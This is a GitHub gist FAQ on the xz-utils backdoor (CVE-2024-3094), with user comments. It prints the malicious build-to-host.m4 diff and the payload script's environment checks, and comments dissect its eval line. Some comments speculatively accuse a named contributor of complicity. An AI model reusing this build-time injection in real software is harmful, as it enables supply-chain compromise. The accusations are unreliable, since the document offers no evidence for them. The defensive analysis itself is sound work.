Skip to content

Instantly share code, notes, and snippets.

@thesamesam
Last active January 25, 2025 19:00
Show Gist options
  • Save thesamesam/223949d5a074ebc3dce9ee78baad9e27 to your computer and use it in GitHub Desktop.
Save thesamesam/223949d5a074ebc3dce9ee78baad9e27 to your computer and use it in GitHub Desktop.
xz-utils backdoor situation (CVE-2024-3094)

FAQ on the xz-utils backdoor (CVE-2024-3094)

This is a living document. Everything in this document is made in good faith of being accurate, but like I just said; we don't yet know everything about what's going on.

Background

On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that gives developers lossless compression. This package is commonly used for compressing release tarballs, software packages, kernel images, and initramfs images. It is very widely distributed, statistically your average Linux or macOS system will have it installed for convenience.

This backdoor is very indirect and only shows up when a few known specific criteria are met. Others may be yet discovered! However, this backdoor is at least triggerable by remote unprivileged systems connecting to public SSH ports. This has been seen in the wild where it gets activated by connections - resulting in performance issues, but we do not know yet what is required to bypass authentication (etc) with it.

We're reasonably sure the following things need to be true for your system to be vulnerable:

  • You need to be running a distro that uses glibc (for IFUNC)
  • You need to have versions 5.6.0 or 5.6.1 of xz or liblzma installed (xz-utils provides the library liblzma) - likely only true if running a rolling-release distro and updating religiously.

We know that the combination of systemd and patched openssh are vulnerable but pending further analysis of the payload, we cannot be certain that other configurations aren't.

While not scaremongering, it is important to be clear that at this stage, we got lucky, and there may well be other effects of the infected liblzma.

If you're running a publicly accessible sshd, then you are - as a rule of thumb for those not wanting to read the rest here - likely vulnerable.

If you aren't, it is unknown for now, but you should update as quickly as possible because investigations are continuing.

TL:DR:

  • Using a .deb or .rpm based distro with glibc and xz-5.6.0 or xz-5.6.1:
    • Using systemd on publicly accessible ssh: update RIGHT NOW NOW NOW
    • Otherwise: update RIGHT NOW NOW but prioritize the former
  • Using another type of distribution:
    • With glibc and xz-5.6.0 or xz-5.6.1: update RIGHT NOW, but prioritize the above.

If all of these are the case, please update your systems to mitigate this threat. For more information about affected systems and how to update, please see this article or check the xz-utils page on Repology.

This is not a fault of sshd, systemd, or glibc, that is just how it was made exploitable.

Design

This backdoor has several components. At a high level:

  • The release tarballs upstream publishes don't have the same code that GitHub has. This is common in C projects so that downstream consumers don't need to remember how to run autotools and autoconf. The version of build-to-host.m4 in the release tarballs differs wildly from the upstream on GitHub.
  • There are crafted test files in the tests/ folder within the git repository too. These files are in the following commits:
  • Note that the bad commits have since been reverted in e93e13c8b3bec925c56e0c0b675d8000a0f7f754
  • A script called by build-to-host.m4 that unpacks this malicious test data and uses it to modify the build process.
  • IFUNC, a mechanism in glibc that allows for indirect function calls, is used to perform runtime hooking/redirection of OpenSSH's authentication routines. IFUNC is a tool that is normally used for legitimate things, but in this case it is exploited for this attack path.

Normally upstream publishes release tarballs that are different than the automatically generated ones in GitHub. In these modified tarballs, a malicious version of build-to-host.m4 is included to execute a script during the build process.

This script (at least in versions 5.6.0 and 5.6.1) checks for various conditions like the architecture of the machine. Here is a snippet of the malicious script that gets unpacked by build-to-host.m4 and an explanation of what it does:

if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

  • If amd64/x86_64 is the target of the build
  • And if the target uses the name linux-gnu (mostly checks for the use of glibc)

It also checks for the toolchain being used:

  if test "x$GCC" != 'xyes' > /dev/null 2>&1;then
  exit 0
  fi
  if test "x$CC" != 'xgcc' > /dev/null 2>&1;then
  exit 0
  fi
  LDv=$LD" -v"
  if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then
  exit 0

And if you are trying to build a Debian or Red Hat package:

if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then

This attack thusly seems to be targeted at amd64 systems running glibc using either Debian or Red Hat derived distributions. Other systems may be vulnerable at this time, but we don't know.

Lasse Collin, the original long-standing xz maintainer, is currently working on auditing the xz.git.

Design specifics

$ git diff m4/build-to-host.m4 ~/data/xz/xz-5.6.1/m4/build-to-host.m4
diff --git a/m4/build-to-host.m4 b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
index f928e9ab..d5ec3153 100644
--- a/m4/build-to-host.m4
+++ b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
@@ -1,4 +1,4 @@
-# build-to-host.m4 serial 3
+# build-to-host.m4 serial 30
 dnl Copyright (C) 2023-2024 Free Software Foundation, Inc.
 dnl This file is free software; the Free Software Foundation
 dnl gives unlimited permission to copy and/or distribute it,
@@ -37,6 +37,7 @@ AC_DEFUN([gl_BUILD_TO_HOST],
 
   dnl Define somedir_c.
   gl_final_[$1]="$[$1]"
+  gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
   dnl Translate it from build syntax to host syntax.
   case "$build_os" in
     cygwin*)
@@ -58,14 +59,40 @@ AC_DEFUN([gl_BUILD_TO_HOST],
   if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
     [$1]_c_make='\"$([$1])\"'
   fi
+  if test "x$gl_am_configmake" != "x"; then
+    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
+  else
+    gl_[$1]_config=''
+  fi
+  _LT_TAGDECL([], [gl_path_map], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
+  _LT_TAGDECL([], [gl_am_configmake], [2])dnl
+  _LT_TAGDECL([], [[$1]_c_make], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
   AC_SUBST([$1_c_make])
+
+  dnl If the host conversion code has been placed in $gl_config_gt,
+  dnl instead of duplicating it all over again into config.status,
+  dnl then we will have config.status run $gl_config_gt later, so it
+  dnl needs to know what name is stored there:
+  AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"])
 ])
 
 dnl Some initializations for gl_BUILD_TO_HOST.
 AC_DEFUN([gl_BUILD_TO_HOST_INIT],
 [
+  dnl Search for Automake-defined pkg* macros, in the order
+  dnl listed in the Automake 1.10a+ documentation.
+  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+  if test -n "$gl_am_configmake"; then
+    HAVE_PKG_CONFIGMAKE=1
+  else
+    HAVE_PKG_CONFIGMAKE=0
+  fi
+
   gl_sed_double_backslashes='s/\\/\\\\/g'
   gl_sed_escape_doublequotes='s/"/\\"/g'
+  gl_path_map='tr "\t \-_" " \t_\-"'
 changequote(,)dnl
   gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
 changequote([,])dnl

Payload

If those conditions check, the payload is injected into the source tree. We have not analyzed this payload in detail. Here are the main things we know:

  • The payload activates if the running program has the process name /usr/sbin/sshd. Systems that put sshd in /usr/bin or another folder may or may not be vulnerable.

  • It may activate in other scenarios too, possibly even unrelated to ssh.

  • We don't entirely know the payload is intended to do. We are investigating.

  • Successful exploitation does not generate any log entries.

  • Vanilla upstream OpenSSH isn't affected unless one of its dependencies links liblzma.

    • Lennart Poettering had mentioned that it may happen via pam->libselinux->liblzma, and possibly in other cases too, but...
    • libselinux does not link to liblzma. It turns out the confusion was because of an old downstream-only patch in Fedora and a stale dependency in the RPM spec which persisted long-beyond its removal.
    • PAM modules are loaded too late in the process AFAIK for this to work (another possible example was pam_fprintd). Solar Designer raised this issue as well on oss-security.
  • The payload is loaded into sshd indirectly. sshd is often patched to support systemd-notify so that other services can start when sshd is running. liblzma is loaded because it's depended on by other parts of libsystemd. This is not the fault of systemd, this is more unfortunate. The patch that most distributions use is available here: openssh/openssh-portable#375.

    • Update: The OpenSSH developers have added non-library integration of the systemd-notify protocol so distributions won't be patching it in via libsystemd support anymore. This change has been committed and will land in OpenSSH-9.8, due around June/July 2024.
  • If this payload is loaded in openssh sshd, the RSA_public_decrypt function will be redirected into a malicious implementation. We have observed that this malicious implementation can be used to bypass authentication. Further research is being done to explain why.

    • Filippo Valsorda has shared analysis indicating that the attacker must supply a key which is verified by the payload and then attacker input is passed to system(), giving remote code execution (RCE).

Tangential xz bits

  • Jia Tan's 328c52da8a2bbb81307644efdb58db2c422d9ba7 commit contained a . in the CMake check for landlock sandboxing support. This caused the check to always fail so landlock support was detected as absent.

    • Hardening of CMake's check_c_source_compiles has been proposed (see Other projects).
  • IFUNC was introduced for crc64 in ee44863ae88e377a5df10db007ba9bfadde3d314 by Hans Jansen.

    • Hans Jansen later went on to ask Debian to update xz-utils in https://bugs.debian.org/1067708, but this is quite a common thing for eager users to do, so it's not necessarily nefarious.

People

We do not want to speculate on the people behind this project in this document. This is not a productive use of our time, and law enforcement will be able to handle identifying those responsible. They are likely patching their systems too.

xz-utils had two maintainers:

  • Lasse Collin (Larhzu) who has maintained xz since the beginning (~2009), and before that, lzma-utils.
  • Jia Tan (JiaT75) who started contributing to xz in the last 2-2.5 years and gained commit access, and then release manager rights, about 1.5 years ago. He was removed on 2024-03-31 as Lasse begins his long work ahead.

Lasse regularly has internet breaks and was on one of these as this all kicked off. He has posted an update at https://tukaani.org/xz-backdoor/ and is working with the community.

Please be patient with him as he gets up to speed and takes time to analyse the situation carefully.

Misc notes

Analysis of the payload

This is the part which is very much in flux. It's early days yet.

These two especially do a great job of analysing the initial/bash stages:

Other great resources:

Other projects

There are concerns some other projects are affected (either by themselves or changes to other projects were made to facilitate the xz backdoor). I want to avoid a witch-hunt but listing some examples here which are already been linked widely to give some commentary.

Tangential efforts as a result of this incident

This is for suggesting specific changes which are being considered as a result of this.

Discussions in the wake of this

This is for linking to interesting general discussions, rather than specific changes being suggested (see above).

Non-mailing list proposals:

Acknowledgements

  • Andres Freund who discovered the issue and reported it to linux-distros and then oss-security.
  • All the hard-working security teams helping to coordinate a response and push out fixes.
  • Xe Iaso who resummarized this page for readability.
  • Everybody who has provided me tips privately, in #tukaani, or in comments on this gist.

Meta

Please try to keep comments on the gist constrained to editorial changes I need to make, new sources, etc.

There are various places to theorise & such, please see e.g. https://discord.gg/TPz7gBEE (for both, reverse engineering and OSint). (I'm not associated with that Discord but the link is going around, so...)

Response to questions

  • A few people have asked why Jia Tan followed me (@thesamesam) on GitHub. #tukaani was a small community on IRC before this kicked off (~10 people, currently has ~350). I've been in #tukaani for a few years now. When the move from self-hosted infra to github was being planned and implemented, I was around and starred & followed the new Tukaani org pretty quickly.

  • I'm referenced in one of the commits in the original oss-security post that works around noise from the IFUNC resolver. This was a legitimate issue which applies to IFUNC resolvers in general. The GCC bug it led to (PR114115) has been fixed.

    • On reflection, there may have been a missed opportunity as maybe I should have looked into why I couldn't hit the reported Valgrind problems from Fedora on Gentoo, but this isn't the place for my own reflections nor is it IMO the time yet.

TODO for this doc

  • Add a table of releases + signer?
  • Include the injection script after the macro
  • Mention detection?
  • Explain the bug-autoconf thing maybe wrt serial
  • Explain dist tarballs, why we use them, what they do, link to autotools docs, etc
    • "Explaining the history of it would be very helpful I think. It also explains how a single person was able to insert code in an open source project that no one was able to peer review. It is pragmatically impossible, even if technically possible once you know the problem is there, to peer review a tarball prepared in this manner."

TODO overall

Anyone can and should work on these. I'm just listing them so people have a rough idea of what's left.

  • Ensuring Lasse Collin and xz-utils is supported, even long after the fervour is over
  • Reverse engineering the payload (it's still fairly early days here on this)
    • Once finished, tell people whether:
      • the backdoor did anything else than waiting for connections for RCE, like:
        • call home (send found private keys, etc)
        • load/execute additional rogue code
        • did some other steps to infest the system (like adding users, authorized_keys, etc.) or whether it can be certainly said, that it didn't do so
      • other attack vectors than via sshd were possible
      • whether people (who had the compromised versions) can feel fully safe if they either had sshd not running OR at least not publicly accessible (e.g. because it was behind a firewall, nat, iptables, etc.)
  • Auditing all possibly-tainted xz-utils commits
  • Investigate other paths for sshd to get liblzma in its process (not just via libsystemd, or at least not directly)
    • This is already partly done and it looks like none exist, but it would be nice to be sure.
  • Checking other projects for similar injection mechanisms (e.g. similar build system lines)
  • Diff and review all "golden" upstream tarballs used by distros against the output of creating a tarball from the git tag for all packages.
  • Check other projecs which (recently) introduced IFUNC, as suggested by thegrugq.
    • This isn't a bad idea even outside of potential backdoors, given how brittle IFUNC is.
  • ???

References and other reading material

@Z-nonymous
Copy link

@Z-nonymous Thanks for your review! I have one thing to underline here - as @Artoria2e5 says:

recall that grep ^build=\'x86_64 config.status above means if build is ever set, it has to start with x86_64.

That means, AIUI, your third example never happens in terms of shell scripts, and instead we need to review the case where build is undefined to emulate non-AMD64 situations.

Yes, it could be an attempt to make it harder to identify what platform is target / protected though.

AFAIK, the eval line just runs the grep command:

eval [arg ...]
The args are read and concatenated together into a single com‐
mand. This command is then read and executed by the shell, and
its exit status is returned as the value of eval. If there are
no args, or only null arguments, eval returns 0.

Since the return code is not used it's a useless line... or obfuscation or the real excempted targets.

Insert a Drake meme with "RCE on all Linuxes" vs "RCE on all Linux but the plaform I use"

@gh-nate
Copy link

gh-nate commented Apr 2, 2024

A walkthrough of the xz attack shell script.
An RC4 variant in Awk, what more could you want?
https://research.swtch.com/xz-scripthttps://hachyderm.io/@rsc/112200603337903320

@xry111
Copy link

xry111 commented Apr 2, 2024

AFAIK, the eval line just runs the grep command:

eval [arg ...]
The args are read and concatenated together into a single com‐
mand. This command is then read and executed by the shell, and
its exit status is returned as the value of eval. If there are
no args, or only null arguments, eval returns 0.

Since the return code is not used it's a useless line... or obfuscation or the real excempted targets.

No. The code is:

eval `grep ^build=\'x86_64 config.status`

From info bash:

3.5.4 Command Substitution

Command substitution allows the output of a command to replace the
command itself. Command substitution occurs when a command is enclosed
as follows:

$(COMMAND)

or

`COMMAND`

Bash performs the expansion by executing COMMAND in a subshell
environment and replacing the command substitution with the standard
output of the command, with any trailing newlines deleted.

So after command substitution it becomes:

eval build='x86_64-pc-linux-gnu'

And yes the exit code is still discarded, but the command build='x86_64-pc-linux-gnu' is still executed by the shell. You can try an example:

cat > config.status << EOF
unrelated_thing_1='114514'
build='x86_64-linux-gnu'
unrelated_thing_2='1919810'
EOF

eval `grep ^build=\'x86_64 config.status`
echo $build

It will output x86_64-linux-gnu. So this line is not a no-op, it basically reads the variable "build" out of config.status.

@erinacio
Copy link

erinacio commented Apr 2, 2024

Please refrain from using this for propaganda and distro-bashing

you can follow the Debian Security Advisory. For RHEL and Fedora users, this post from Red Hat should help.

If your distro don't publish such security guides (could be as simple as a tweet/toot/whatever, but must be informative), I would personally suggest you move to a more responsible distro.

Debian and its derivatives and RH-distros were the ones affected by it, and by using sd_notify and by building the pkgs as they do. You are branding irresposnible those who were unaffected? Was Alpine affected, should they publish instructions for how this xz compromise couldn't do jack on musl? (I don't know whether they actually published a warning or not). You are saying they should dump Alpine and use Ubuntu testing or Fedora or RHell

Easy there!

Unless someone is not telling us ALL the true and entire story if it wasn't for systemd deb and rpm there would have been nothing to talk about here, would there be?

You just misinterpreted what I means. Even a simple notice like "We're not affected." is sufficient in such case. A more comprehensive notice (like what Arch did) could be better, but not strictly required.

I think it's a basic responsibility for a distro maintainer to publish such notice. I didn't mean and never mean Debian or Red Hat or anything is superior and users should switch to them. Just because they're affected and they have a wide user adoption I took them as examples. openSUSE also published a great guide and was affected but because it seems to have less adoption I didn't list it in my original comment.

Was Alpine affected, should they publish instructions for how this xz compromise couldn't do jack on musl?

Yes. I really think they should, but don't need to go into tech depth. Just say "We use musl so we're not affected." is sufficient. There are even macOS users who just installed xz 5.6.x from homebrew and worried if they could be hacked. Not all people can understand how the backdoor works.

Update: And they really did: https://twitter.com/alpinelinux/status/1773781993844519408. Just as what I said, responsible distros will publish such notices.

@Osiris-Team
Copy link

What about xz for Java (https://mvnrepository.com/artifact/org.tukaani/xz), is it safe?

@Artoria2e5
Copy link

Artoria2e5 commented Apr 2, 2024

@erinacio
Yes. I really think they should, but don't need to go into tech depth. Just say "We use musl so we're not affected." is sufficient. There are even macOS users who just installed xz 5.6.x from homebrew and worried if they could be hacked. Not all people can understand how the backdoor works.

Update: And they really did: https://twitter.com/alpinelinux/status/1773781993844519408. Just as what I said, responsible distros will publish such notices.

Arch Linux is the opposite: it incorrectly states that it shipped backdoored versions in https://archlinux.org/news/the-xz-package-has-been-backdoored/. Binary diff by Felix Yan shows that only the build id changed between 5.6.1-1 (made from the bad tarball) and 5.6.1-2 (made from git tag).

Maybe @dvzrv can fix this? (I hope this doesn't cause him to subscribe automatically, because this is a high-traffic thread.) There is a clarification that libsystemd is not present, so it could not have affected sshd, but it's not the same level of assurance as "the code is simply not there".


@Osiris-Team XZ for Java is not known to be affected by this backdoor. It's not as easy to hide bad things in pure Java code...

@Gasu16
Copy link

Gasu16 commented Apr 2, 2024

What about xz for Java (https://mvnrepository.com/artifact/org.tukaani/xz), is it safe?

It still considered to be safe at the moment, the latest commit have been done by the original authors, Jia Tan committed in January 2024, updating the README for bug report

https://git.tukaani.org/?p=xz-java.git;a=shortlog;pg=0
https://blog.sonatype.com/cve-2024-3094-the-targeted-backdoor-supply-chain-attack-against-xz-and-liblzma
https://security.apache.org/blog/cve-2024-3094/

@erinacio
Copy link

erinacio commented Apr 2, 2024

@erinacio
Yes. I really think they should, but don't need to go into tech depth. Just say "We use musl so we're not affected." is sufficient. There are even macOS users who just installed xz 5.6.x from homebrew and worried if they could be hacked. Not all people can understand how the backdoor works.
Update: And they really did: https://twitter.com/alpinelinux/status/1773781993844519408. Just as what I said, responsible distros will publish such notices.

Arch Linux is the opposite: it incorrectly states that it's affected in https://archlinux.org/news/the-xz-package-has-been-backdoored/. Binary diff by Felix Yan shows that only the build id changed between 5.6.1-1 (made from the bad tarball) and 5.6.1-2 (made from git tag).

Maybe @​dvzrv can fix this? (I hope this doesn't cause him to subscribe automatically, because this is a high-traffic thread.)

Well I think a false-positive is tolerable in such case, especially given that the last section of the notice indicated that Arch might not be affected due to liblzma not dynamically linked to sshd. At that time we just didn't have enough understand about the backdoor. It was annoying but won't cause real damage, in contrast of a false-negative.

@Artoria2e5
Copy link

Artoria2e5 commented Apr 2, 2024

@flybyray

The eval [...] could do harm for the generic vanilla kernel builds.

It could, indeed in theory, replace the whole script there with an early exit. It could even, in theory, manage to add a module to the kernel.

It does not though. There is simply no evidence of this attack having anything to do with the kernel.

The kernel's xz decompressor is extremely stripped down. It's been forked off since before JT took over. (This only means the decompressor is likely not backdoored. This would not stop a new version of malicious xz from adding a module.)

ask your self why they used sh as a pipe target and not as others (KBZIP2,LZMA,ZSTD,...) the tool itself. the shell process will populate a lot more background information useful to activate the payload injections.

The answer is right there in xz_wrap.sh, in case $SRCARCH in. Each architecture has its own branch/call/jump filters that help improve compression ratio by (reversibly) turning relative jump addresses into absolute addresses.

as this is just commited short before public announcment of this CVE

What is "this"? xz_wrap was recently changed by Lesse, but the changes are reasonable and do not introduce any new eval; the options are consistent with manpage recommendations. The Makefiles were recently changed for version and other reasons, not much to do with xz.

The more pertinent "time pressure" theory is from Solar Designer: https://www.openwall.com/lists/oss-security/2024/03/31/9. It turns out libsystemd decided to load liblzma lazily (dlopen()) in a future version, so if the payload isn't pushed out now, it would stop working soon.

@AdrianBunk
Copy link

@thesamesam Does anyone have IRC logs, and if yes are they being analyzed?

These should contain hints about timezone, location, mother tongue and cultural background of the attacker.

@christoofar
Copy link

Please refrain from using this for propaganda and distro-bashing

you can follow the Debian Security Advisory. For RHEL and Fedora users, this post from Red Hat should help.

If your distro don't publish such security guides (could be as simple as a tweet/toot/whatever, but must be informative), I would personally suggest you move to a more responsible distro.

Debian and its derivatives and RH-distros were the ones affected by it, and by using sd_notify and by building the pkgs as they do. You are branding irresposnible those who were unaffected? Was Alpine affected, should they publish instructions for how this xz compromise couldn't do jack on musl? (I don't know whether they actually published a warning or not). You are saying they should dump Alpine and use Ubuntu testing or Fedora or RHell

Easy there!

Unless someone is not telling us ALL the true and entire story if it wasn't for systemd deb and rpm there would have been nothing to talk about here, would there be?

There's not one specific point in the chain that's a concern, there's like 10+ of them. And what's really disappointing to see is the rush to moan about focus of any particular part of the chain and squash any enthusiasm to rethink any part of it.

@dguerri
Copy link

dguerri commented Apr 2, 2024

Quick Docker setup based on xzbot, to demonstrate backdoor usage

@przemoc
Copy link

przemoc commented Apr 2, 2024

My attempt at collecting and organizing links related to xz backdoor (2024) aka CVE-2024-3094.

https://przemoc.github.io/xz-backdoor-links/
or
https://github.com/przemoc/xz-backdoor-links/blob/main/index.mm.md

Nothing new there (sorry for that), but for those that are late to the news (I guess it's less and less possible every minute) may slightly help navigate through various resources related to this topic.

@fungilife
Copy link

@thesamesam Does anyone have IRC logs, and if yes are they being analyzed?
These should contain hints about timezone, location, mother tongue and cultural background of the attacker.

This is not the object here, please concentrate. It is not a Hollywood police movie we are living in. The focus should be at the object not the subject responsible. State agencies I am sure have their own forums and discussion panels to investigate what they do.

Despite of what I read here and in openwall discussions, a slight doubt remains in my head. If systemd was portable in musl and packages were built like in debian/rh would the same mechanism be effective, or is musl making a difference elsewhere, as in the compiling and linking process of xz/lzma? Otherwise it seems that if sd_notify doesn't trigger a process the rest is just as dirt sitting besides library items, not replacing or modifying anything else.

By the way, arch had built two versions that were infected, 5.6.0-1 and 5.6.1-1, 5.6.1-2 was built from git not tarball with the distro's native tools, 5.6.1-3 was built from git.tukaani.org those are the discovered infected tar balls, but the same entity has signed tarballs further back retroactively.

@redcode
Copy link

redcode commented Apr 2, 2024

@thesamesam Does anyone have IRC logs, and if yes are they being analyzed?
These should contain hints about timezone, location, mother tongue and cultural background of the attacker.

This is not the object here, please concentrate. It is not a Hollywood police movie we are living in. The focus should be at the object not the subject responsible. State agencies I am sure have their own forums and discussion panels to investigate what they do.

Who are you to decide what the object should be here or how to narrow down what people want to investigate? Let Sam ask for whatever he wants, besides, the gist is his and he's doing a good job.

You are nobody's boss, so don't be impertinent.

@marco-silva0000
Copy link

How hard is it to be objective and civil these days?
This is the logging policy, https://libera.chat/policies/#public-logging
Also, I haven't seen any logs shared anywhere.
I think there's value on that type of analysis, but ultimately it can be considered out of scope of this gist by it's creator.

@orbea
Copy link

orbea commented Apr 2, 2024

This is not the object here, please concentrate. It is not a Hollywood police movie we are living in. The focus should be at the object not the subject responsible. State agencies I am sure have their own forums and discussion panels to investigate what they do.

The state agencies may be involved in this themselves and knowing who organized this attack may shed light on what kind of payload was going to be used or who the intended targets were. I don't think it is wise to prematurely shut down any relevant avenue of investigation.

@wibeipummedo
Copy link

wibeipummedo commented Apr 2, 2024

Saw an interesting commit over in cpython: python/cpython@ea51476

Its part of PR python/cpython#115989

The bytecode there seem to be .xz test files from the 5.6.1 release.

Fortunately the cpython developers appear to have removed the bytecode from the PR (python/cpython@32725a7)

I then saw the person who made the PR to cpython seems to be 'Chien Wong' who:

a) has a commit in xz-utils recently (https://git.tukaani.org/?p=xz.git;a=commit;h=eee579fff50099ba163c12305e81a4bd42b7dd53)
b) was thanked by Jia Tan for the work on the RISC-V stuff (https://git.tukaani.org/?p=xz.git;a=commit;h=440a2eccb082dc13400c09e22308a58fef85146c) - note that Jia Tan updated the risc-v 'test' files (https://git.tukaani.org/?p=xz.git;a=commit;h=0b4ccc91454dbcf0bf521b9bd51aa270581ee23c)
c) pushed for a Rust project to be updated to include xz 5.6.0 (Portable-Network-Archive/liblzma-rs#91)
d) mentioned a questioned change in the cpython PR as, basically, 'this was important to prevent build failing' - different scenario, and kind of make sense, but it remind me of the apparent reasoning for 'fixing' the valgrind issue. (https://github.com/python/cpython/pull/115989/files#r1505355565)

Not saying that person is involved in this, could just be poor timing (everything can look suspicious due to hindsight). Person was perhaps just excited to have added the RISC-V feature and wanted to see other projects use it. And it is for different architecture than the known backdoor. Just wondered if this risked adding a form of backdoor to python at the time, even as accident. EDIT as said below by AdrianBunk and others, probably is just bad timing after all. NM

@DiagonalArg
Copy link

DiagonalArg commented Apr 3, 2024

This is not the object here, please concentrate. It is not a Hollywood police movie we are living in. The focus should be at the object not the subject responsible. State agencies I am sure have their own forums and discussion panels to investigate what they do.

The state agencies may be involved in this themselves and knowing who organized this attack may shed light on what kind of payload was going to be used or who the intended targets were. I don't think it is wise to prematurely shut down any relevant avenue of investigation.

Agreed. Also, discussing who, is necessary to work out the team or network of sockpuppets that may be involved. That may help identify other PR's that may be prongs of the attack, or other, as yet unidentified, attacks.

@christoofar
Copy link

cpython is just a binding project... all you should care about is Is The Binding Alive??? you would normally just compress and decompress some test string and call it a day.

There was ZERO reason to bring all that shit into the cpython repo. If you are so worried about the RISCV variant you would, as a client of the downstream lib, just testbed that.

This is not a coinkidink.

@christoofar
Copy link

Saw an interesting commit over in cpython: python/cpython@ea51476

Its part of PR python/cpython#115989

The bytecode there seem to be .xz test files from the 5.6.1 release.

Fortunately the cpython developers appear to have removed the bytecode from the PR (python/cpython@32725a7)

I then saw the person who made the PR to cpython seems to be 'Chien Wong' who:

a) has a commit in xz-utils recently (https://git.tukaani.org/?p=xz.git;a=commit;h=eee579fff50099ba163c12305e81a4bd42b7dd53) b) was thanked by Jia Tan for the work on the RISC-V stuff (https://git.tukaani.org/?p=xz.git;a=commit;h=440a2eccb082dc13400c09e22308a58fef85146c) - note that Jia Tan updated the risc-v 'test' files (https://git.tukaani.org/?p=xz.git;a=commit;h=0b4ccc91454dbcf0bf521b9bd51aa270581ee23c) c) pushed for a Rust project to be updated to include xz 5.6.0 (Portable-Network-Archive/liblzma-rs#91) d) mentioned a questioned change in the cpython PR as, basically, 'this was important to prevent tests failing' - different scenario but it remind me of the apparent reasoning for 'fixing' the valgrind issue. (python/cpython@68979bc#r1505355565)

Not saying that person is involved in this, could just be poor timing (everything can look suspicious due to hindsight). Person was perhaps just excited to have added the RISC-V feature and wanted to see other projects use it. And it is for different architecture than the known backdoor. Just wondered if this risked adding a form of backdoor to python at the time, even as accident.

The PR would have caused CPython to move up the version it is binding to. This particular audience matters. A lot. It's the SoC tinkerboard community. They'll drive the mass adoption as Jia makes more enhancements and creating more targets.

This is a significant find.

@redcode
Copy link

redcode commented Apr 3, 2024

Saw an interesting commit over in cpython: python/cpython@ea51476

Its part of PR python/cpython#115989

The bytecode there seem to be .xz test files from the 5.6.1 release.

Fortunately the cpython developers appear to have removed the bytecode from the PR (python/cpython@32725a7)

I then saw the person who made the PR to cpython seems to be 'Chien Wong' who:

a) has a commit in xz-utils recently (https://git.tukaani.org/?p=xz.git;a=commit;h=eee579fff50099ba163c12305e81a4bd42b7dd53) b) was thanked by Jia Tan for the work on the RISC-V stuff (https://git.tukaani.org/?p=xz.git;a=commit;h=440a2eccb082dc13400c09e22308a58fef85146c) - note that Jia Tan updated the risc-v 'test' files (https://git.tukaani.org/?p=xz.git;a=commit;h=0b4ccc91454dbcf0bf521b9bd51aa270581ee23c) c) pushed for a Rust project to be updated to include xz 5.6.0 (Portable-Network-Archive/liblzma-rs#91) d) mentioned a questioned change in the cpython PR as, basically, 'this was important to prevent tests failing' - different scenario but it remind me of the apparent reasoning for 'fixing' the valgrind issue. (python/cpython@68979bc#r1505355565)

Not saying that person is involved in this, could just be poor timing (everything can look suspicious due to hindsight). Person was perhaps just excited to have added the RISC-V feature and wanted to see other projects use it. And it is for different architecture than the known backdoor. Just wondered if this risked adding a form of backdoor to python at the time, even as accident.

This guy claimed to be "an engineer from Bouffalo Lab", and his GitHub account was registered in 2015, 1 year before Bouffalo was founded (2016). Bouffalo Lab has products that use RISC-V cores, for example this one.

Looking at his commits, I see that sometimes he uses an email with domain bouffalolab.com, and other times, when he merges PRs, etc, another one with his personal domain. A priori he does not look like a spy/hacker.

The PR would have caused CPython to move up the version it is binding to. This particular audience matters. A lot. It's the SoC tinkerboard community. They'll drive the mass adoption as Jia makes more enhancements and creating more targets.

This is a significant find.

Interesting... maybe he was being manipulated by Jia Tan?

His website consists of a blog with a single post about liblzma written this year (March 9th).

@AdrianBunk
Copy link

cpython is just a binding project...

The PR would have caused CPython to move up the version it is binding to. This particular audience matters. A lot. It's the SoC tinkerboard community. They'll drive the mass adoption as Jia makes more enhancements and creating more targets.

It might be better for @christoofar to stop commenting here since he is only making a fool out of himself.

The tinkerboard community is a rather small part of the Linux community, without any real influence on anything.
And "cpython is just a binding project" is, well, the same as saying "I don't have the slightest clue what I am talking about".

@thesamesam
Copy link
Author

thesamesam commented Apr 3, 2024

@AdrianBunk I have IRC logs but I don't want to post them publicly because it feels wrong. In part because it is affecting other members of the community.

I will share with any official bodies who request it, also Lasse who has his own, but wants to be able to verify them against mine. Also open to any other reasonable requests. I just don't want to dump them en-masse either.

I appreciate this might be a bit controversial but I don't want to throw out every norm we have in FOSS either.

@thesamesam
Copy link
Author

@JohnVeness Thank you, fixing!

@lhmouse
Copy link

lhmouse commented Apr 3, 2024

The name 'Chien Wong' is a bit suspicious, as this person claims to live in Nanjing, but neither word is Mandarin, and confuses native speakers. We do not know how to pronounce 'Chien'. It's like this person is from HK or TW. My advice is to write to Bouffalo Lab for confirmation.

@duanqn
Copy link

duanqn commented Apr 3, 2024

The name 'Chien Wong' is a bit suspicious, as this person claims to live in Nanjing, but neither word is Mandarin, and confuses native speakers. We do not know how to pronounce 'Chien'. It's like this person is from HK or TW. My advice is to write to Bouffalo Lab for confirmation.

It is unusual but I don't think the name spelling itself is enough to call him/her 'suspicious'.

@christoofar
Copy link

The name 'Chien Wong' is a bit suspicious, as this person claims to live in Nanjing, but neither word is Mandarin, and confuses native speakers. We do not know how to pronounce 'Chien'. It's like this person is from HK or TW. My advice is to write to Bouffalo Lab for confirmation.

I'm going to go with the theory that this is Jia Team Partner 2. I think this removes all doubt.

ivq/homepage@696470a#diff-36b91ec80ca75f577eb44c59060b08c14c8a7dda2f9bebabe65f31278d4e7a65

@thesamesam

@AdrianBunk
Copy link

